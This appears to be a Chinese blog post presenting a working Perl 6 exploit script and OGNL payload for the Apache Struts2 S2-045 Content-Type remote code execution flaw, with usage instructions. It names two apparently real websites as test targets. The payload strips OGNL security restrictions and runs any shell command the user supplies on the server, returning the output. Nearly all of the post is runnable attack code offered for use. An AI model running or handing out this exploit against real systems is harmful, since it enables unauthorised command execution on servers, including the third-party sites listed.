测试站点:
http://www.yutian.com.cn/index.action
http://www.hjxzyzz.com:8088/pfw/login.action
代码如下:
use v6;
use HTTP::UserAgent;
use HTTP::Request;
use URI::Encode;
#say @*ARGS;
#say {@*ARGS};
if @*ARGS.elems < 0 {
say 'Use: s2.p6 "http://www.target.com/target.action"';
exit;
}
#for @*ARGS -> $A {say $A;}
#say 'Number:'~@*ARGS.elems;
#say @*ARGS[0];
#my $c = @*ARGS[1..Inf];
#say $c;
#say $c.WHAT;
#exit;
my $url = @*ARGS[0];#链接
my $com = @*ARGS[1..Inf];#命令
$url = uri_encode($url);
say 'check url: ' ~ $url;
my $data = slurp 'data.txt';
#替换
if so $com {
$data = do given $data {S/whoami/$com/};
}
#say $data;
#exit;
my $request = HTTP::Request.new(GET => $url);
$request.header.field(:content-type($data));
my $ua = HTTP::UserAgent.new();
my $repo = $ua.request($request);
say $repo.content;
POC如下(也就是上面代码的 data.txt 文件内容):
%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
注意这个POC是一整串字符串, 没有换行的, 如果有换行PERL6的HTTP::UserAgent可能设置Content-Type后不能正常工作。
测试效果:
用法, 把脚本保存为:s2045.p6
再 perl6 s2045.p6 http://targeturl.action 命令 或 test.p6 http://targeturl.action
参考链接:
perl6中的替换: http://www.cnblogs.com/perl6/p/6975683.html
perl6中的HTTP::UserAgent: http://www.cnblogs.com/perl6/p/7134600.html
perl5 s2-045: http://www.cnblogs.com/perl6/p/6517626.html